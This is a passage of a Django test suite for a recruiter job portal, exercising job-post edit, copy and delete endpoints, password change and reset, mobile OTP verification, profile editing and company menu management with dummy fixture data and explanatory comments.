'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1',
'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Walk-in',
'status': 'Pending', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'edu_qualification': [self.qualification.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year', 'min_salary': '1',
'max_salary': '3',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Internship',
'status': 'Pending', 'vacancies': '1',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'min_salary': '1000', 'max_salary': '2000',
'salary_type': 'Month',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
def test_view_job(self):
    """Walk the job-post lifecycle endpoints: view, preview, deactivate,
    enable and delete.

    NOTE: statement order matters — deactivate/enable/delete mutate the
    same JobPost rows that earlier statements read, and ``self.job_post``
    is a lazy queryset re-evaluated at each ``.first()``/``.last()`` call.
    """
    user_login = self.client.login(email='recruiter@mp.com', password='mp')
    self.assertTrue(user_login)
    # Lazy queryset over all posts created by the fixtures.
    self.job_post = JobPost.objects.all()
    # Viewing an existing post renders the detail template.
    response = self.client.get(
        reverse('recruiter:view', kwargs={'job_post_id': self.job_post.first().id}))
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(response, 'recruiter/job/view.html')
    # Unknown post id -> custom recruiter 404 page.
    response = self.client.get(
        reverse('recruiter:view', kwargs={'job_post_id': '100'}))
    self.assertEqual(response.status_code, 404)
    self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
    # Previewing a Draft post is expected to 404.
    response = self.client.get(reverse('recruiter:preview', kwargs={
        'job_post_id': self.job_post.filter(status='Draft').first().id}))
    self.assertEqual(response.status_code, 404)
    # Previewing an unknown id also 404s with the custom page.
    response = self.client.get(
        reverse('recruiter:preview', kwargs={'job_post_id': '100'}))
    self.assertEqual(response.status_code, 404)
    self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
    # Deactivate the first post; endpoint replies with a JSON status.
    response = self.client.get(reverse(
        'recruiter:deactivate_job', kwargs={'job_post_id': self.job_post.first().id}))
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(error_data['response'], 'Job Post Deactivated')
    # Re-enable the same post.
    response = self.client.get(
        reverse('recruiter:enable', kwargs={'job_post_id': self.job_post.first().id}))
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(
        error_data['response'], 'Job Post enabled Successfully')
    # Delete the last post in the queryset.
    response = self.client.get(
        reverse('recruiter:delete', kwargs={'job_post_id': self.job_post.last().id}))
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(
        error_data['response'], 'Job Post deleted Successfully')
def test_copy_job(self):
    """Exercise the recruiter:copy endpoint with one invalid and four
    valid form payloads (full-time, two Walk-in variants, Internship).

    NOTE: order-dependent — each successful POST creates a JobPost that
    later fixtures/tests may see.  Several payload dicts below repeat the
    'published_message' key; in a dict literal the last occurrence wins
    ('hellooo').
    """
    user_login = self.client.login(email='recruiter@mp.com', password='mp')
    self.assertTrue(user_login)
    self.job_post = JobPost.objects.filter()
    self.job_post_id = self.job_post.first().id
    self.url = reverse('recruiter:copy', kwargs={
        'status': 'full_time'}) + "?jobpost_id=" + str(self.job_post_id)
    # Copying a non-existent post id -> custom 404 page.
    response = self.client.get(reverse(
        'recruiter:copy', kwargs={'status': 'full_time'}) + "?jobpost_id=" + str(100))
    self.assertEqual(response.status_code, 404)
    self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
    # Copying a real post renders the copy form.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(response, 'recruiter/job/copy.html')
    # POST 1: deliberately invalid — 'visa_country' is the literal string
    # 'self.country.id', not a valid choice.
    response = self.client.post(self.url,
                                data={'title': 'test-job-post',
                                      'status': 'Draft',
                                      'vacancies': '',
                                      'description': 'job post description',
                                      'published_message': 'test message',
                                      'company_address': 'company address',
                                      'company_description': 'company description',
                                      'last_date': self.current_date,
                                      'skills': [self.skill.id],
                                      'location': [self.city.id],
                                      'industry': [self.industry.id],
                                      'functional_area': [self.functional_area.id],
                                      'final_industry': self.other_ind,
                                      'final_skills': self.other_skill,
                                      'final_edu_qualification': self.other_edu,
                                      'final_functional_area': self.fa,
                                      'no_of_interview_location': '0',
                                      'min_year': '1', 'max_year': '0',
                                      'visa_required': ['True'],
                                      'visa_country': ['self.country.id'],
                                      'visa_type': ['hello'],
                                      'job_type': 'full-time',
                                      'code': 'code',
                                      'job_role': 'developer',
                                      'min_month': '2', 'max_month': '1',
                                      'company_name': 'micro',
                                      'company_website': 'http://abc.com',
                                      'published_date': '06/23/2018 13:36:28',
                                      'min_salary': '1000',
                                      'max_salary': '2000',
                                      'agency_amount': '10000',
                                      'agency_client': self.agency_company.id,
                                      'agency_category': self.agency_category.id,
                                      'agency_invoice_type': 'Recurring',
                                      'agency_job_type': 'Permanent',
                                      'agency_recruiters': [self.recruiter.id],
                                      'salary_type': 'Year',
                                      'published_message': 'hellooo'}
                                )
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    expected_errors = {'error': True,
                       'response': {'visa_country': ['Select a valid choice. That choice is not one of the available choices.']}}
    self.assertEqual(error_data, expected_errors)
    # POST 2: valid full-time post with two interview locations.
    response = self.client.post(self.url, data={'title': 'test-job-post',
                                                'status': 'Draft',
                                                'vacancies': '9',
                                                'description': 'job post description',
                                                'published_message': 'test message',
                                                'company_address': 'company address',
                                                'company_description': 'company description',
                                                'last_date': self.current_date,
                                                'skills': [self.skill.id],
                                                'location': [self.city.id],
                                                'industry': [self.industry.id],
                                                'functional_area': [self.functional_area.id],
                                                'final_industry': self.other_ind,
                                                'final_skills': self.other_skill,
                                                'final_edu_qualification': self.other_edu,
                                                'final_functional_area': self.fa,
                                                'min_year': '0', 'max_year': '1',
                                                'visa_required': ['True'],
                                                'visa_country': self.country.id,
                                                'country': self.country.id,
                                                'visa_type': ['hello'],
                                                'job_type': 'full-time',
                                                'code': 'code', 'job_role': 'developer',
                                                'min_month': '1', 'max_month': '2',
                                                'company_name': 'micro',
                                                'company_website': 'http://abc.com',
                                                'published_date': '06/23/2018 13:36:28',
                                                'keywords': ['key1', 'key2'],
                                                'min_salary': '1000',
                                                'max_salary': '2000',
                                                'no_of_interview_location': '2',
                                                'final_location_1': ['[13.1543, 77.783]'],
                                                'final_location_2': ['[13.1543, 77.783]'],
                                                'venue_details_2': 'hyd',
                                                'venue_details_1': 'mp',
                                                'show_location_1': 'False',
                                                'salary_type': 'Year',
                                                'show_location_2': 'True',
                                                'agency_amount': '10000',
                                                'agency_client': self.agency_company.id,
                                                'agency_category': self.agency_category.id,
                                                'agency_invoice_type': 'Recurring',
                                                'agency_job_type': 'Permanent',
                                                'agency_recruiters': [self.recruiter.id],
                                                'published_message': 'hellooo'
                                                })
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(error_data['response'], 'Job Post Created Successfully')
    # POST 3: valid Walk-in Draft post.
    response = self.client.post(self.url, data={'title': 'new-copy-test-job-post',
                                                'job_type': 'Walk-in',
                                                'status': 'Draft', 'vacancies': '9',
                                                'description': 'job post description',
                                                'published_message': 'test message',
                                                'company_address': 'company address',
                                                'company_description': 'company description',
                                                'last_date': self.current_date,
                                                'skills': [self.skill.id],
                                                'location': [self.city.id],
                                                'industry': [self.industry.id],
                                                'functional_area': [self.functional_area.id],
                                                'final_industry': self.other_ind,
                                                'final_skills': self.other_skill,
                                                'final_edu_qualification': self.other_edu,
                                                'final_functional_area': self.fa,
                                                'no_of_interview_location': '0',
                                                'min_year': '1',
                                                'max_year': '0',
                                                'visa_required': ['True'],
                                                'visa_country': self.country.id,
                                                'country': self.country.id,
                                                'visa_type': ['hello'],
                                                'code': 'code',
                                                'job_role': 'developer',
                                                'min_month': '1',
                                                'max_month': '2',
                                                'company_name': 'micro',
                                                'company_website': 'http://abc.com',
                                                'published_date': '06/23/2018 13:36:28',
                                                'keywords': ['key1', 'key2'],
                                                'walkin_from_date': self.walk_in_from_date,
                                                'walkin_to_date': self.walk_in_to_date,
                                                'walkin_time': '00:00',
                                                'walkin_contactinfo': 'hyderabad, india',
                                                'salary_type': 'Year',
                                                'min_salary': '1000', 'max_salary': '2000',
                                                'agency_amount': '10000',
                                                'agency_client': self.agency_company.id,
                                                'agency_category': self.agency_category.id,
                                                'agency_invoice_type': 'Recurring',
                                                'agency_job_type': 'Permanent',
                                                'agency_recruiters': [self.recruiter.id],
                                                'published_message': 'hellooo'})
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(error_data['response'], 'Job Post Created Successfully')
    # POST 4: valid Walk-in Pending post with education qualification and
    # social-network flags; the 'country' field is intentionally omitted.
    response = self.client.post(self.url, data={'title': 'my-copy-test-job-post',
                                                'job_type': 'Walk-in',
                                                'status': 'Pending',
                                                'vacancies': '7',
                                                'description': 'job post description',
                                                'published_message': 'test message',
                                                'company_address': 'company address',
                                                'company_description': 'company description',
                                                'last_date': self.current_date,
                                                'skills': [self.skill.id],
                                                'location': [self.city.id],
                                                'industry': [self.industry.id],
                                                'edu_qualification': [self.qualification.id],
                                                'functional_area': [self.functional_area.id],
                                                'final_industry': self.other_ind,
                                                'final_skills': self.other_skill,
                                                'final_edu_qualification': self.other_edu,
                                                'final_functional_area': self.fa,
                                                'no_of_interview_location': '0',
                                                'min_year': '0', 'max_year': '1',
                                                'visa_required': ['True'],
                                                'visa_country': self.country.id,
                                                # 'country': self.country.id,
                                                'visa_type': ['hello'],
                                                'code': 'code',
                                                'job_role': 'developer',
                                                'min_month': '1', 'max_month': '2',
                                                'company_name': 'micro',
                                                'company_website': 'http://abc.com',
                                                'published_date': '06/23/2018 13:36:28',
                                                'keywords': ['key1', 'key2'],
                                                'walkin_from_date': self.walk_in_from_date,
                                                'walkin_to_date': self.walk_in_to_date,
                                                'walkin_time': '00:00',
                                                'walkin_contactinfo': 'hyderabad, india',
                                                'salary_type': 'Year', 'min_salary': '1',
                                                'max_salary': '3',
                                                'fb_post': 'on', 'tw_post': 'on',
                                                'ln_post': 'on',
                                                'agency_amount': '10000',
                                                'agency_client': self.agency_company.id,
                                                'agency_category': self.agency_category.id,
                                                'agency_invoice_type': 'Recurring',
                                                'agency_job_type': 'Permanent',
                                                'agency_recruiters': [self.recruiter.id],
                                                'published_message': 'hellooo'})
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(
        error_data['response'], 'Job Post Created Successfully')
    # POST 5: valid Internship Pending post.
    response = self.client.post(self.url,
                                data={'title': 'copy-test-job-post',
                                      'job_type': 'Internship',
                                      'status': 'Pending', 'vacancies': '1',
                                      'description': 'job post description',
                                      'published_message': 'test message',
                                      'company_address': 'company address',
                                      'company_description': 'company description',
                                      'last_date': self.current_date,
                                      'skills': [self.skill.id],
                                      'location': [self.city.id],
                                      'industry': [self.industry.id],
                                      'functional_area': [self.functional_area.id],
                                      'final_industry': self.other_ind,
                                      'final_skills': self.other_skill,
                                      'final_edu_qualification': self.other_edu,
                                      'final_functional_area': self.fa,
                                      'no_of_interview_location': '0',
                                      'min_year': '0', 'max_year': '1',
                                      'visa_required': ['True'],
                                      'visa_country': self.country.id,
                                      # 'country': self.country.id,
                                      'visa_type': ['hello'],
                                      'code': 'code',
                                      'job_role': 'developer',
                                      'min_month': '1', 'max_month': '2',
                                      'company_name': 'micro',
                                      'company_website': 'http://abc.com',
                                      'published_date': '06/23/2018 13:36:28',
                                      'keywords': ['key1', 'key2'],
                                      'walkin_from_date': self.walk_in_from_date,
                                      'walkin_to_date': self.walk_in_to_date,
                                      'walkin_time': '00:00',
                                      'walkin_contactinfo': 'hyderabad, india',
                                      'min_salary': '1000',
                                      'max_salary': '2000',
                                      'salary_type': 'Year',
                                      'fb_post': 'on', 'tw_post': 'on',
                                      'ln_post': 'on',
                                      'agency_amount': '10000',
                                      'agency_client': self.agency_company.id,
                                      'agency_category': self.agency_category.id,
                                      'agency_invoice_type': 'Recurring',
                                      'agency_job_type': 'Permanent',
                                      'agency_recruiters': [self.recruiter.id],
                                      'published_message': 'hellooo'})
    self.assertEqual(response.status_code, 200)
    error_data = json.loads(str(response.content, encoding='utf-8'))
    self.assertEqual(
        error_data['response'], 'Job Post Created Successfully')
# def test_send_mobile_verification_code(self):
# user_login = self.client.login(email='recruiter@mp.com', password='mp')
# self.assertTrue(user_login)
# self.url = reverse('recruiter:send_mobile_verification_code')
# response = self.client.post(self.url, {'': ''})
# self.assertEqual(response.status_code, 302)
# error_data = json.loads(str(response.content, encoding='utf-8'))
# expected_errors = {
# 'message': 'OTP Already sent to you, Please request new OTP', 'error': True}
# self.assertEqual(error_data, expected_errors)
def test_change_password(self):
    """Change-password flow: success, wrong old password, mismatched
    confirmation, missing old password, and finally restoring 'mp'.

    Fix: removed a duplicated ``assertEqual(response.status_code, 200)``
    that asserted the same response twice in a row.

    NOTE: order matters — the first successful POST changes the password
    to 'pwd', which later steps rely on.
    """
    user_login = self.client.login(email='recruiter@mp.com', password='mp')
    self.assertTrue(user_login)
    self.url = reverse('recruiter:change_password')
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/user/change_password.html')
    # Valid change: mp -> pwd.
    response = self.client.post(
        self.url,
        {
            'oldpassword': 'mp', 'newpassword': 'pwd', 'retypepassword': 'pwd'
        })
    self.assertEqual(response.status_code, 200)
    self.assertTrue(
        str('Password changed successfully') in response.content.decode('utf8'))
    # Re-authenticate with the new password.
    user_login = self.client.login(
        email='recruiter@mp.com', password='pwd')
    # Wrong old password -> no change.
    response = self.client.post(
        self.url,
        {
            'oldpassword': 'micro123', 'newpassword': 'mp', 'retypepassword': 'mp'
        })
    self.assertEqual(response.status_code, 200)
    self.assertFalse(
        str('Password changed successfully') in response.content.decode('utf8'))
    # New/retype mismatch -> no change.
    response = self.client.post(
        self.url,
        {
            'oldpassword': 'pwd', 'newpassword': 'micro123', 'retypepassword': 'mp'
        })
    self.assertEqual(response.status_code, 200)
    self.assertFalse(
        str('Password changed successfully') in response.content.decode('utf8'))
    # Missing old password -> no change.
    response = self.client.post(
        self.url,
        {
            'newpassword': 'pwd', 'retypepassword': 'pwd'
        })
    self.assertEqual(response.status_code, 200)
    self.assertFalse(
        str('Password changed successfully') in response.content.decode('utf8'))
    # Restore the original password: pwd -> mp.
    response = self.client.post(
        self.url,
        {
            'oldpassword': 'pwd', 'newpassword': 'mp', 'retypepassword': 'mp'
        })
    self.assertEqual(response.status_code, 200)
    self.assertTrue(
        str('Password changed successfully') in response.content.decode('utf8'))
def test_user_password_reset(self):
    """Password-reset endpoint: GET is rejected, a registered email gets a
    reset link, an unknown email is reported as unregistered."""
    self.url = reverse('recruiter:user_password_reset')

    def payload(resp):
        # Decode a response's JSON body.
        return json.loads(resp.content.decode('utf-8'))

    # GET is not a supported method.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertEqual(
        payload(response),
        {'error': True, "email": "Method is not supported"})
    # Registered address: a reset link is sent.
    response = self.client.post(self.url, {'email': 'recruiter@mp.com'})
    self.assertEqual(response.status_code, 200)
    self.assertEqual(
        payload(response),
        {'error': False,
         'info': 'Sent a link to your email, reset your password by clicking that link'})
    # Unknown address: explicit error.
    response = self.client.post(
        self.url, {'email': 'new_recruiter@mp.com'})
    self.assertEqual(response.status_code, 200)
    self.assertEqual(
        payload(response),
        {'error': True, 'email': 'User With this Email ID not Registered'})
def test_verify_mobile(self):
    """Mobile OTP verification: a wrong code is rejected with a field
    error, the code '123456' verifies this fixture user."""
    self.assertTrue(self.client.login(
        email='recruiter_mobile@mp.com', password='mp'))
    self.url = reverse('recruiter:verify_mobile')
    # The verification form renders on GET.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(response, 'recruiter/user/mobile_verify.html')
    # Wrong OTP -> field error in the JSON payload.
    response = self.client.post(
        self.url, {'mobile_verification_code': 'abcde'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(body, {'error': True, 'response': {
        'mobile_verification_code': "Otp didn't match, Try again later"}})
    # Correct OTP (presumably seeded by the fixtures) -> verified.
    response = self.client.post(
        self.url, {'mobile_verification_code': '123456'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {'error': False, 'message': 'Mobile Verified successfully'})
def test_edit_profile(self):
    """Account activation 404s and a full recruiter-profile update POST."""
    user_login = self.client.login(
        email='recruiter_mobile@mp.com', password='mp')
    self.assertTrue(user_login)
    self.url = reverse('recruiter:edit_profile')
    self.user = User.objects.get(email='recruiter_mobile@mp.com')
    # NOTE(review): attribute set without .save() — it does not persist,
    # so the view under test never observes this change; confirm intent.
    self.user.mobile_verified = False
    # NOTE(review): assigned on the TestCase, not on self.user — likely a
    # typo for self.user.last_mobile_code_verified_on; confirm.
    self.last_mobile_code_verified_on = '06/23/2018 13:36:28'
    response = self.client.get(
        reverse('recruiter:account_activation', kwargs={'user_id': self.recruiter.id}))
    self.assertEqual(response.status_code, 404)
    # Also unsaved (see note above); the endpoint still 404s either way.
    self.user.mobile_verified = True
    response = self.client.get(
        reverse('recruiter:account_activation', kwargs={'user_id': self.recruiter.id}))
    self.assertEqual(response.status_code, 404)
    # The edit-profile form renders on GET.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(response, 'recruiter/user/details.html')
    # Full profile-update payload; only the status code is asserted.
    response = self.client.post(self.url, {'username': 'recruiter123',
                                           'first_name': 'recruiter',
                                           'last_name': 'recruiter',
                                           'nationality': '1',
                                           'mobile': '0987654321',
                                           'technical_skills': [self.skill.id],
                                           'industry': [self.industry.id],
                                           'functional_area': [self.functional_area.id],
                                           'year': '1990',
                                           'month': '5',
                                           'profile_description': 'recruiter description',
                                           'job_role': 'developer',
                                           'company_type': 'startup',
                                           'city': self.city.id,
                                           'state': self.state.id,
                                           'user_id': self.user.id,
                                           'dob': '09/09/1970',
                                           'name': 'microtest',
                                           'website': 'microcompany.com',
                                           'address': 'hello',
                                           'permanent_address': 'jrlo',
                                           'marital_status': 'Married'})
    self.assertEqual(response.status_code, 200)
    # Disabled multipart upload variant kept for reference:
    # upload_file = open('static/img/report.png', 'rb')
    # file_dict = {'profile_pic': SimpleUploadedFile(
    #     upload_file.name, upload_file.read())}
    # data = {'username': 'recruiter', 'first_name': 'recruiter',
    #         'last_name': 'recruiter', 'nationality': '1',
    #         'mobile': '0987654321', 'technical_skills': [self.skill.id],
    #         'industry': [self.industry.id],
    #         'functional_area': [self.functional_area.id], 'year': '1990',
    #         'month': '5', 'profile_description': 'recruiter description',
    #         'job_role': 'developer', 'company_type': 'startup', 'name': 'mp',
    #         'city': self.city.id, 'state': self.state.id,
    #         'user_id': self.user.id, 'show_email': 'on', 'email_notifications': 'on', 'dob': '09-09-1990'}
    # response = self.client.post(self.url, data, file_dict, format='multipart/form-data')
    # self.assertEqual(response.status_code, 200)
def test_index(self):
    """Registration/login entry point for inactive and re-activated
    recruiters; every request answers 200."""
    self.url = reverse('recruiter:new_user')
    # Deactivate the fixture recruiter first.
    self.inactive_recruiter.is_active = False
    self.inactive_recruiter.save()
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(response, 'recruiter/register.html')
    # While inactive: wrong password, then right password.
    for attempt in ('mp123', 'mp'):
        response = self.client.post(
            self.url,
            {'email': self.inactive_recruiter.email, 'password': attempt})
        self.assertEqual(response.status_code, 200)
    # Re-activate and log in again with the right password.
    self.inactive_recruiter.is_active = True
    self.inactive_recruiter.save()
    response = self.client.post(
        self.url, {'email': self.inactive_recruiter.email, 'password': 'mp'})
    self.assertEqual(response.status_code, 200)
def test_company_add_menu(self):
    """Adding company menus: a blank URL fails validation, three distinct
    valid menus all create successfully."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.url = reverse('recruiter:add_menu')
    # Blank URL -> field validation error.
    response = self.client.post(
        self.url, {'title': 'company-menu', 'url': '', 'status': 'True'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {'response': {'url': ['This field is required.']}, 'error': True})
    # Each valid (title, url) pair yields the same success payload.
    menus = [
        ('company-menu', 'http://testingsite.com/company'),
        ('company-menu-new', 'http://testing.com/company'),
        ('company-menu-other', 'http://testing.com/other-company'),
    ]
    for title, url in menus:
        response = self.client.post(
            self.url, {'title': title, 'url': url, 'status': 'True'})
        self.assertEqual(response.status_code, 200)
        body = json.loads(response.content.decode('utf-8'))
        self.assertEqual(
            body, {"error": False, 'response': 'Menu created successfully'})
def test_company_edit_menu(self):
    """Editing an existing company menu: blank URL fails, valid data
    succeeds (the endpoint replies 'Menu created successfully' even on
    an edit, per the asserted payload)."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.menu = Menu.objects.create(
        title="menu-test",
        url='http://micropyramid.com/testing',
        lvl='123',
        company=self.recruiter.company)
    self.url = reverse(
        'recruiter:edit_menu', kwargs={'menu_id': self.menu.id})
    # Blank URL -> validation error.
    response = self.client.post(
        self.url, {'title': 'company-menu', 'url': '', 'status': 'True'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {'response': {'url': ['This field is required.']}, 'error': True})
    # Valid update.
    response = self.client.post(self.url, {
        'title': 'company new menu',
        'url': 'http://testingsite.com/new-company',
        'status': 'False'})
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {"error": False, 'response': 'Menu created successfully'})
def test_company_menu_status(self):
    """Toggling a menu's status always redirects, for both an existing
    and an unknown menu id."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.url = reverse('recruiter:menu_status', kwargs={'menu_id': '1'})
    # Toggle twice: both requests redirect.
    for _ in range(2):
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 302)
    # Unknown menu id also redirects.
    response = self.client.get(
        reverse('recruiter:menu_status', kwargs={'menu_id': '10'}))
    self.assertEqual(response.status_code, 302)
def test_company_menu_order(self):
    """Menu-reorder query parameters on the jobs index.

    Fix: the query strings contained the mojibake '¤t=' where
    '&current=' was intended ('&curren' collapsed into U+00A4 CURRENCY
    SIGN, an HTML-entity artifact).
    """
    user_login = self.client.login(email='recruiter@mp.com', password='mp')
    self.assertTrue(user_login)
    # NOTE(review): self.url is built but never requested below — the GETs
    # target jobs:index; confirm whether recruiter:menu_order was intended.
    self.url = reverse('recruiter:menu_order')
    response = self.client.get(reverse('jobs:index') + '?prev=1&current=2')
    self.assertEqual(response.status_code, 200)
    response = self.client.get(reverse('jobs:index') + '?prev=2&current=1')
    self.assertEqual(response.status_code, 200)
def test_company_delete_menu(self):
    """Deleting a menu: succeeds for an owned menu, reports a generic
    failure for an unknown id."""
    self.assertTrue(
        self.client.login(email='recruiter@mp.com', password='mp'))
    self.menu = Menu.objects.create(
        title="test-mneu", url='http://micropyramid.com', lvl='123',
        company=self.recruiter.company)
    self.url = reverse(
        'recruiter:delete_menu', kwargs={'menu_id': self.menu.id})
    # Deleting the freshly created menu succeeds.
    response = self.client.get(self.url)
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(
        body, {"error": False, 'response': 'Menu Deleted Successfully'})
    # Unknown id -> generic failure payload.
    response = self.client.get(
        reverse('recruiter:delete_menu', kwargs={'menu_id': '10'}))
    self.assertEqual(response.status_code, 200)
    body = json.loads(response.content.decode('utf-8'))
    self.assertEqual(body, {"error": True, 'response': 'Some Problem Occurs'})
def test_company(self):
    """Company microsite page, recruiter list (with search/pagination),
    recruiter profile (with filters), and activation toggling."""
    user_login = self.client.login(email='recruiter@mp.com', password='mp')
    self.assertTrue(user_login)
    # Company microsite view.
    response = self.client.get(reverse('recruiter:view_company'))
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/view_microsite_page.html')
    # Recruiter list, plain and with search/pagination query params.
    response = self.client.get(reverse('recruiter:company_recruiter_list'))
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_list.html')
    response = self.client.get(
        reverse('recruiter:company_recruiter_list') + '?search=active')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_list.html')
    response = self.client.get(
        reverse('recruiter:company_recruiter_list') + '?search=recruiter')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_list.html')
    response = self.client.get(
        reverse('recruiter:company_recruiter_list') + '?page=1')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_list.html')
    # Recruiter profile for a real id; unknown id -> custom 404.
    response = self.client.get(reverse(
        'recruiter:company_recruiter_profile', kwargs={'recruiter_id': self.recruiter.id}))
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_profile.html')
    response = self.client.get(
        reverse('recruiter:company_recruiter_profile', kwargs={'recruiter_id': '1000'}))
    self.assertEqual(response.status_code, 404)
    self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
    # Profile view with each supported filter/query param.
    response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
        'recruiter_id': self.recruiter.id}) + '?job_status=Live')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_profile.html')
    response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
        'recruiter_id': self.recruiter.id}) + '?search_value=Internship')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
        response, 'recruiter/company/recruiter_profile.html')
    response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
        'recruiter_id': self.recruiter.id}) + '?page=1')
    self.assertEqual(response.status_code, 200)
    self.assertTemplateUsed(
